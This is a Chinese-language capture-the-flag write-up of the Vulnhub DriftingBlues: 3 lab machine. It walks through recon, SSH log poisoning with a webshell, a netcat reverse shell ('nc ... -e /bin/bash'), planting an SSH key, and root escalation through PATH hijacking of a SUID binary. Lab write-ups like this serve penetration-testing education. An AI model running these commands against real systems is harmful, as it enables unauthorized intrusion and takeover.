[Vulnhub靶机] DriftingBlues: 3靶机渗透思路及方法（个人分享）

靶机下载地址：

https://download.vulnhub.com/driftingblues/driftingblues3.ova

---

靶机地址：192.168.67.19

攻击机地址：192.168.67.3

---

一、信息收集

1.使用 arp-scan 命令扫描网段内存活的主机，以获取靶机ip地址

arp-scan -I 指定网卡 -l

2.使用 nmap 工具扫描靶机开放端口、服务版本以及系统版本，得到开放端口22、80及其服务ssh、http

nmap -sV -O 靶机地址

        -sV        探测主机服务版本

        -O         识别主机操作系统

3.访问web网页，没有发现有用信息，尝试使用 dirsearch 工具扫描靶机网站目录，得到robots.txt

dirsearch -u 靶机URL

        -u        指定目标URL

4.访问靶机 robots.txt 页面，得到 /eventadmins 页面

5.继续访问 /eventadmins ，得到提示。提示中说明ssh可能存在漏洞，还得到了 /littlequeenofspades.html 页面

6.继续访问 /littlequeenofspades.html ，发现页面没有有用信息回显，查看网页源代码得到一串base64加密的内容

7.通过两次base64解密后得到 /adminsfixit.php，查看后发现该文件为ssh身份验证日志文件

二、漏洞利用

分析ssh日志文件后发现，ssh远程连接时登录的用户名会被写入到该文件内，尝试利用该漏洞将一句话木马写入到 /adminsfixit.php内

重新访问 /adminsfixit.php 网页，并通过cmd参数进行测试，发现成功写入

三、反弹shell

1.进行反向反弹shell，攻击机开启 nc 监听

nc -lvp 监听端口号 靶机地址

        -l             开启监听

        -v            显示详细输出

        -p            指定监听端口

2.利用木马执行 nc 命令，尝试反弹shell

nc 攻击机地址 监听端口号 -e /bin/bash

        -e        指定对应的应用程序

3.成功反弹shell，进入靶机并成功执行命令

4.利用python中pty模块的创建交互式shell

python -c 'import pty;pty.spawn("/bin/bash")'

        -c        在命令行中调用python代码

pty.spawn() 函数是pty模块中的一个函数，用于创建一个子进程，并将其连接到一个伪终端。通过这个伪终端，我们可以与子进程进行交互，就像在控制台上一样。

5.分析查看靶机内文件，发现home目录下有一个robertj用户，且该用户目录下存在两个文件，user.txt”文件没有权限无法打开，.ssh 目录有可读可写可执行权限

6.进入 .ssh 目录进行查看，发现目录内没有任何文件内容

7.继续查看分析，查看ssh配置文件（默认目录/etc/ssh/sshd_config），发现可以公钥登录，并且给出了公钥文件存放目录 /home/robertj/.ssh/authorized_keys

8.尝试把公钥放入.ssh目录内，使用 ssh-keygen 工具生成公密钥，并将生成的密钥保存到 /home/robertj/.ssh/ 目录下

ssh-keygen -t rsa

        -t        指定生成的密钥类型，默认为RSA类型

9.将生成的公钥内容输出到authorized_keys文件内

10.查看私钥文件，将内容复制出来，粘贴到本地文件中

注意要将id_rsa文件的权限修改为与创建时权限一致

11.使用私钥进行登录，成功登录robertj用户

ssh robertj@192.168.66.140 -i id_rsa

        -i        指定身份验证文件，用于身份验证

四、提权

1.使用 find 命令寻找suid程序，发现一个可疑程序/usr/bin/getinfo

find / -perm -4000 2>/dev/null 或 find / -perm -u=s 2>/dev/null

        -perm         按照权限查找文件（4000、2000、1000分别表示SUID，SGID，SBIT权限，如777为普通文件最高权限，7000为特殊文件的最高权限）

使用find命令的时候在命令后加 2>/dev/null 将错误结果输出重定向到/dev/null中，/dev/null是一个特殊的设备文件，其实质为空设备文件，其大小是0字节，所有人都有读写权限，而其主要作用就是将接收的一切输出给它的数据并丢弃，就像垃圾桶，也被称为位桶(bit bucket)

2.执行该程序，根据执行结果发现分别运行了ip addr、cat /etc/hosts、uname -a命令

3.可以通过修改环境来进行命令劫持提权

通过修改环境变量让getinfo在调用命令调用到我们伪造的ip命令（在检索环境时会先调用最前面的环境也就是最新写入的环境），来达到提权的效果

export PATH=/tmp/:$PATH             把/tmp路径写入到系统路径中

cd /tmp

echo '/bin/bash' > ip                       把/bin/bash写入到ip文件中(相当于创建ip并写入/bin/bash)

chmod +x ip                                    给ip文件增加执行权限

4.再次运行getinfo，成功提权至root权限